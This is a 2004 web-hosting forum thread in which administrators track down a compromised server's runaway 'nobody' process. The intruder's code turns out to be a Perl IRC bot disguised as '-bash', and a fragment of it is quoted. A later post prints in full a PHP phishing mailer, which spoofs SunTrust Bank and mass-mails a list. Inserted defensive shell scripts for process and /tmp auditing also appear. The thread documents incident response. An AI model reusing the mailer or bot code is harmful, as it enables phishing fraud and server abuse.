The Community Forums


Nobody user?

Discussion in 'General Discussion' started by Daemon1, Dec 5, 2004.

  1. Daemon1

    Daemon1 Well-Known Member

    Joined:
    Nov 26, 2003
    Messages:
    87
    Likes Received:
    0
    Trophy Points:
    6
    Hi,

    I was wondering if someone could give me some information about a process I have running, owned by the nobody user, that's chewing 69% of the CPU. Is this normal to see? Or should I get it checked out? If anyone can provide some details about this, and what I can do to check what exactly is causing it, it would be appreciated. Thanks.
     
  2. dezignguy

    dezignguy Well-Known Member

    Joined:
    Sep 26, 2004
    Messages:
    534
    Likes Received:
    0
    Trophy Points:
    16
    Yes, you do need to check this out... I can't say much else about it because you didn't give any further info. Show the output from 'ps aux' and 'top'.

    It could be one of your customers just running a script that's pretty popular, or poorly written... or it could be a DoS, spam, or hack program that was uploaded and run through insecure scripts.
     
  3. Daemon1

    Daemon1 Well-Known Member

    Joined:
    Nov 26, 2003
    Messages:
    87
    Likes Received:
    0
    Trophy Points:
    6
    This is the output of ps aux:

    nobody 6948 0.0 0.0 0 0 ? Z Dec05 0:00 [sh <defunct>]
    nobody 6955 0.0 0.0 1876 4 ? T Dec05 0:00 cround
    nobody 6956 0.0 0.0 0 0 ? Z Dec05 0:00 [cround <defunct>
    nobody 6957 0.0 0.0 2144 496 ? S Dec05 0:00 cround
    nobody 30577 0.3 0.8 18288 8576 ? S 00:52 1:00 /usr/local/apache
    nobody 30885 0.0 0.0 0 0 ? Z 01:02 0:00 [sh <defunct>]
    nobody 30891 91.7 0.2 7252 2524 ? R 01:02 300:30 -bash
    nobody 8513 0.2 0.4 15316 4988 ? S 06:09 0:03 /usr/local/apache
    nobody 8845 0.0 0.3 15028 3916 ? S 06:21 0:00 /usr/local/apache
    nobody 9024 0.4 0.5 15312 5280 ? S 06:25 0:01 /usr/local/apache
    nobody 9032 0.3 0.4 15332 5068 ? S 06:25 0:00 /usr/local/apache
    nobody 9074 0.3 0.4 15232 5044 ? S 06:26 0:00 /usr/local/apache
    nobody 9123 0.0 0.3 13836 3476 ? S 06:28 0:00 /usr/local/apache

    And the results of top:

    30891 nobody 25 0 2524 2524 956 R 91.0 0.2 300:16 0 perl

    That's the process chewing the CPU, which I have since killed... (actually, attempts at killing this process do nothing). What are the above processes doing in the output of ps aux?
     
    #3 Daemon1, Dec 6, 2004
    Last edited: Dec 6, 2004
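    A way to triage a listing like the one above, added here as an example and not code from the thread or from cPanel: the script reads ps aux lines and sorts the nobody-owned processes into zombies (already dead, so kill cannot touch them and they hold no CPU), expected web-server children, and anything else, flagging the ones burning CPU. SAMPLE_PS is a constructed copy of Daemon1's output; the Apache command prefix and the 50% CPU threshold are assumptions for this demo.

```shell
#!/bin/sh
# Added example (not from the thread): triage a ps aux listing for one user.
# SAMPLE_PS is constructed, modelled on the output posted above.
SAMPLE_PS='nobody 6948 0.0 0.0 0 0 ? Z Dec05 0:00 [sh <defunct>]
nobody 6957 0.0 0.0 2144 496 ? S Dec05 0:00 cround
nobody 30577 0.3 0.8 18288 8576 ? S 00:52 1:00 /usr/local/apache
nobody 30885 0.0 0.0 0 0 ? Z 01:02 0:00 [sh <defunct>]
nobody 30891 91.7 0.2 7252 2524 ? R 01:02 300:30 -bash
nobody 8513 0.2 0.4 15316 4988 ? S 06:09 0:03 /usr/local/apache'

# triage_ps [USER] [ALLOWED_PREFIX] [CPU_LIMIT]: reads ps aux lines on stdin and
# prints one verdict per process owned by USER (default: nobody).
# ps aux columns: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND...
# ALLOWED_PREFIX (assumed: /usr/local/apache) is what the web-server user is
# expected to run; CPU_LIMIT (assumed: 50) separates SUSPECT from REVIEW.
triage_ps() {
    awk -v user="${1:-nobody}" -v allowed="${2:-/usr/local/apache}" -v lim="${3:-50}" '
    $1 != user { next }
    {
        cmd = $11
        for (i = 12; i <= NF; i++) cmd = cmd " " $i
        if (substr($8, 1, 1) == "Z") {
            # A zombie has already exited: it holds no CPU and kill cannot affect it.
            # It goes away when its parent (here Apache) reaps it or is restarted.
            print "ZOMBIE  pid=" $2 " cmd=" cmd
        } else if (index(cmd, allowed) == 1) {
            print "OK      pid=" $2 " cmd=" cmd
        } else if ($3 + 0 >= lim) {
            # The web-server user running something that is not the web server and
            # burning CPU: the pattern in the thread (a script that renamed itself -bash).
            print "SUSPECT pid=" $2 " cpu=" $3 "% cmd=" cmd
        } else {
            print "REVIEW  pid=" $2 " cmd=" cmd
        }
    }'
}

# Wrappers over the constructed sample so the results can be checked.
sample_triage() { printf '%s\n' "$SAMPLE_PS" | triage_ps nobody; }
count_verdict() { sample_triage | grep -c "^$1" || true; }

sample_triage
```

On a live box, run `ps aux | triage_ps nobody` instead of the sample; the PIDs printed under SUSPECT are the ones to inspect before anything is killed.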
  4. mher

    mher Well-Known Member

    Joined:
    Jun 14, 2004
    Messages:
    49
    Likes Received:
    0
    Trophy Points:
    6
    This same thing is happening with me. A process called perl and owned by nobody is causing high load on the server, and you can't kill the process.

    The first thing to do is check your /tmp directory for suspicious perl scripts. If you find one, delete it and then restart httpd. That will take the load back to normal.

    I already secured my tmp dir by running /scripts/securetmp but that doesn't prevent your users from uploading scripts and running them.

    This seems a major cPanel security bug.
     
  5. Daemon1

    Daemon1 Well-Known Member

    Joined:
    Nov 26, 2003
    Messages:
    87
    Likes Received:
    0
    Trophy Points:
    6
    I've secured tmp as per instruction of the cPanel guys, and it actually made it 4x as bad lol. I didn't check it for anything prior, however... Should this still occur after it has been secured? Or should the tmp dir content be removed first, then secured? What should I do now, considering the tmp dir has already been secured but the problem still exists, and is in fact worse?

    I forgot to ask: what defines a suspicious cgi tmp file? I see a couple; I removed them all and now there is nothing but sess_ files in /tmp. I restarted httpd but the process still exists!
     
    #5 Daemon1, Dec 6, 2004
    Last edited: Dec 6, 2004
  6. Daemon1

    Daemon1 Well-Known Member

    Joined:
    Nov 26, 2003
    Messages:
    87
    Likes Received:
    0
    Trophy Points:
    6
    I found the script in ./tmp :

    my $processo = '-bash';
    #----------------------------------------------##
    my $linas_max='10'; #
    #----------------------------------------------#
    my $sleep='3'; #
    #

    And all this other stuff; this is consistent with the command chewing the CPU... I have removed this file from the tmp dir and restarted httpd, and it is still running! Gah! Anyone?
     
  7. mher

    mher Well-Known Member

    Joined:
    Jun 14, 2004
    Messages:
    49
    Likes Received:
    0
    Trophy Points:
    6
    $processo

    That sounds like the Brazilian hackers.

    Basically you can remove all files in tmp except for the mysql.sock.
     
  8. Daemon1

    Daemon1 Well-Known Member

    Joined:
    Nov 26, 2003
    Messages:
    87
    Likes Received:
    0
    Trophy Points:
    6
    Wiped out everything but mysql.sock, restarted httpd and process still exists...

    Manually killed it with "kill -9 xxxx" and that got rid of it once I had deleted it from tmp. CPU state seems OK in ssh via "top"; however, WHM is still reporting extreme CPU usage, and still listing the -bash processes running and hogging it all!
     
    #8 Daemon1, Dec 6, 2004
    Last edited: Dec 6, 2004
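    The two things that tripped Daemon1 up here, as an added example and not code from the thread or from cPanel: deleting the script from /tmp does not stop a copy already loaded in the interpreter (and restarting httpd does not either, because the script has long since detached from Apache), and a program can rewrite its own argv[0] so that ps and top show "-bash" while the executable is really perl. The functions below assume a Linux /proc layout; `is_disguised` is a pure comparison that can be checked without a live process, and `check_pid` reads /proc for a real PID. Interpreters reached through symlinks (sh resolving to dash, for instance) also show a mismatch and need the same eyeball check.

```shell
#!/bin/sh
# Added example (not from the thread). Linux /proc layout assumed.

# is_disguised REAL_EXE ARGV0: exit 0 (true) when the name a process advertises
# (argv[0], which a program can overwrite, e.g. Perl's $0 = '-bash') differs
# from the program actually executing. A leading "-" only marks a login shell
# and is ignored. An unreadable executable ("?" or empty) is not judged.
is_disguised() {
    real=${1##*/}
    case "$real" in ""|"?") return 1 ;; esac
    shown=${2#-}
    shown=${shown##*/}
    [ "$real" != "$shown" ]
}

# check_pid PID: inspect one live process. Prints the real executable and the
# advertised name, whether the program file was deleted on disk, and any open
# files unlinked while still open (the removed /tmp script is typically one).
# Such a process survives rm and an httpd restart; only ending the PID (kill -9
# as a last resort) stops it. Returns 2 when the PID does not exist.
check_pid() {
    pid=$1
    [ -d "/proc/$pid" ] || { echo "no such pid: $pid"; return 2; }
    exe=$(readlink "/proc/$pid/exe" 2>/dev/null || echo "?")
    argv0=$(tr '\0' '\n' < "/proc/$pid/cmdline" 2>/dev/null | head -n 1)
    echo "pid=$pid exe=$exe argv0=$argv0"
    case "$exe" in
        *' (deleted)') echo "  program file deleted on disk but still running" ;;
    esac
    for fd in /proc/"$pid"/fd/*; do
        target=$(readlink "$fd" 2>/dev/null) || continue
        case "$target" in
            *' (deleted)') echo "  open but unlinked: $target" ;;
        esac
    done
    clean_exe=$(printf '%s' "$exe" | sed 's/ (deleted)$//')
    if is_disguised "$clean_exe" "$argv0"; then
        echo "  DISGUISED: shows as '$argv0' but runs $clean_exe"
    fi
}

# Stand-alone use: ./check.sh PID (inspects the PID given on the command line).
if [ -n "${1:-}" ]; then
    check_pid "$1"
fi
```

Pair it with the PID that ps or WHM reports for the runaway nobody process; the "open but unlinked" line is what confirms that the file removed from /tmp is the one still executing.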
  9. dezignguy

    dezignguy Well-Known Member

    Joined:
    Sep 26, 2004
    Messages:
    534
    Likes Received:
    0
    Trophy Points:
    16
    You're likely going to need an OS reload... unless you're positive that they weren't able to run a local exploit to get root... as they at least tried some local kernel overflows.
     
  10. Daemon1

    Daemon1 Well-Known Member

    Joined:
    Nov 26, 2003
    Messages:
    87
    Likes Received:
    0
    Trophy Points:
    6
    The script appeared to have something to do with IRC...


    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
    if (defined($IRC_socket)) {
    $IRC_cur_socket = $IRC_socket;

    $IRC_socket->autoflush(1);
    $sel_cliente->add($IRC_socket);

    $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
    $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
    $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
    nick("$meunick");
    sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
    sleep 1;


    There is a bunch of DCC/socket bs also in the script. I have since been able to get CPU usage back to normal since removing this script, and I haven't noticed anything else out of the ordinary thus far. Anything to check for in this instance to make sure nothing further did occur?
     
  11. mher

    mher Well-Known Member

    Joined:
    Jun 14, 2004
    Messages:
    49
    Likes Received:
    0
    Trophy Points:
    6
    One of your users uploaded this script and ran it. They can do that again until you find out who they are and terminate them.

    An OS reload won't help at all if you are still going to use cPanel and host that user, whoever he is.

    One way to know who the user was is to do ls -lh in the tmp directory and find out when the file was created. Then look at the logs of your users for any matches.
     
    #11 mher, Dec 7, 2004
    Last edited: Dec 7, 2004
  12. Daemon1

    Daemon1 Well-Known Member

    Joined:
    Nov 26, 2003
    Messages:
    87
    Likes Received:
    0
    Trophy Points:
    6
    Would the fact that the /tmp directory wasn't secured via /scripts/securetmp until yesterday suggest it could have been a public user? I have a very small client base, so it would be more likely that it was someone public, if possible. The file has been removed; I only have a copy locally, unfortunately, so ls -lh does not provide any information about which user put it there, if so...
     
  13. sleuth1

    sleuth1 Well-Known Member

    Joined:
    Mar 16, 2003
    Messages:
    75
    Likes Received:
    0
    Trophy Points:
    6
    /scripts/securetmp won't stop .pl scripts in tmp, and your up-to-date moron hacker is well aware of this; they upload the scripts via insecure PHP programs, often phpNuke, and various unpatched forums.

    You can get a Linux security person to check your box and harden a lot of things off.

    My own daily security audit (at least twice a day), because they will be back:

    Login via WHM (first, for speed) > Current CPU > look for any suspicious programs:

    anything nobody (should not be there)
    anything ./script
    anything weird, e.g. http1, inetds, etc.


    Need to kill nobody quickly?

    Click on the nobody pid (far left) > kill all processes owned by nobody.

    (Or, before killing nobody) Find something?

    Do > List current running processes > this should show you exactly where the script is. Look for /tmp, dev/shm, var/spool/mail (ssh to the directory and remove).

    ssh > cd /tmp
    ls -al
    Look for weird files > only sessions, cPanel tmp, mysql sock, SpamAssassin and a few others.
    Look for:
    ./ ok
    ../ ok
    .../ this one is a hack

    Then check your bandwidth usage

    http://yourservername.com/bandwidth/

    This is updated very quickly, so you should know exactly how much DDoSing some poor devil has received from your machine (which seems to be the sole purpose of moron hackers).
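    The /tmp walk sleuth1 describes and the "when did the file appear, and who was hitting the server at that minute" check mher suggested two posts earlier, written up as one added example (not code from the thread or from cPanel). `audit_dir` reports hidden names other than . and .. (the "..." directory above) and anything that looks like a script, while skipping the expected residents (sockets such as mysql.sock, PHP sess_* files); `log_hits_at` pulls the POST requests from an access log for the minute a file was created, since uploads through a broken web form arrive as POSTs. The directory layout, the log lines, their addresses and timestamps are all constructed; the combined log format is assumed.

```shell
#!/bin/sh
# Added example (not from the thread). Sample directory and log are constructed.

# audit_dir DIR: print entries worth a second look in a world-writable directory:
# hidden names other than . and .. (the thread's "..." directory) and files that
# look like scripts (.pl/.php/.sh/.cgi suffix, or a #! first line). Sockets
# (mysql.sock) and PHP session files (sess_*) are skipped as expected residents.
audit_dir() {
    for p in "$1"/* "$1"/.*; do
        [ -e "$p" ] || continue
        name=${p##*/}
        case "$name" in
            .|..)                  continue ;;
            .*)                    echo "HIDDEN $p"; continue ;;
            sess_*)                continue ;;
            *.pl|*.php|*.sh|*.cgi) echo "SCRIPT $p"; continue ;;
        esac
        [ -S "$p" ] && continue
        if [ -f "$p" ] && [ "$(head -c 2 "$p" 2>/dev/null)" = "#!" ]; then
            echo "SCRIPT $p"
        fi
    done
}

# log_hits_at 'DD/Mon/YYYY:HH:MM' < access_log: POST requests logged in the
# minute a suspicious file was created (take the minute from ls -l on the file;
# GNU ls --full-time gives seconds). Combined log format assumed:
# IP - - [stamp] "METHOD URI PROTO" status bytes ...
log_hits_at() {
    grep -F "[$1" | awk '$6 == "\"POST" { print $1, $4, $7 }'
}

# Constructed sample log (RFC 5737 documentation addresses, invented timestamps).
SAMPLE_LOG='203.0.113.7 - - [05/Dec/2004:23:58:12 +0000] "GET /forum/index.php HTTP/1.0" 200 4312 "-" "Mozilla"
203.0.113.7 - - [05/Dec/2004:23:59:01 +0000] "POST /forum/modules.php?name=Forums HTTP/1.0" 200 512 "-" "Mozilla"
198.51.100.20 - - [06/Dec/2004:01:02:30 +0000] "GET /images/logo.gif HTTP/1.0" 200 2048 "-" "Mozilla"'

# make_sample_dir: build a throwaway directory shaped like the /tmp in the
# thread and print its path (the caller removes it).
make_sample_dir() {
    d=$(mktemp -d)
    mkdir "$d/..."                       # hidden dot-dot-dot directory
    : > "$d/sess_0123abcd"               # PHP session file: expected
    printf '#!/usr/bin/perl\n' > "$d/c"  # suffix-less script: caught by its #! line
    printf '<?php\n' > "$d/sun.php"      # stand-in for the mailer in the last post
    echo "$d"
}

d=$(make_sample_dir)
audit_dir "$d"
printf '%s\n' "$SAMPLE_LOG" | log_hits_at '05/Dec/2004:23:59'
rm -rf "$d"
```

On a live server, run `audit_dir /tmp`, `audit_dir /dev/shm` and `audit_dir /var/spool/mail` as in sleuth1's list, then feed each account's access log to `log_hits_at` with the minute from the file's timestamp; the account whose log carries the matching POST is the one whose web application needs patching.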
     
  14. Amorya

    Amorya Member

    Joined:
    Apr 28, 2004
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    Found this (as sun.php) in my /tmp directory:

    Code:
    <?php
    include("ini.inc");
    $mail_header  = "From: Suntrust Bank<accounts@suntrust.com>\n";
    $mail_header .= "Content-Type: text/html\n";
    $subject="Customer Notification";
    $body=loadini("test.txt");
    if (!($fp = fopen("list.txt", "r")))
            exit("Unable to open $listFile.");
    $i=0;
    print "Pocetno Vreme "; print date("Y:m:d H:i"); print "\n";
    while (!feof($fp)) {
            fscanf($fp, "%s", $name);
            $i++;
            mail($name, $subject, $body, $mail_header);
    }
    print "Krajno Vreme E "; print date("Y:m:d H:i"); print "\n";
    print "$i"; print "E-mailite Se Prateni."; print"\n";
    ?>
    
    I have renamed it and will delete it shortly. My server still seems to be pouring out huge volumes of mail, though...


    Amorya
     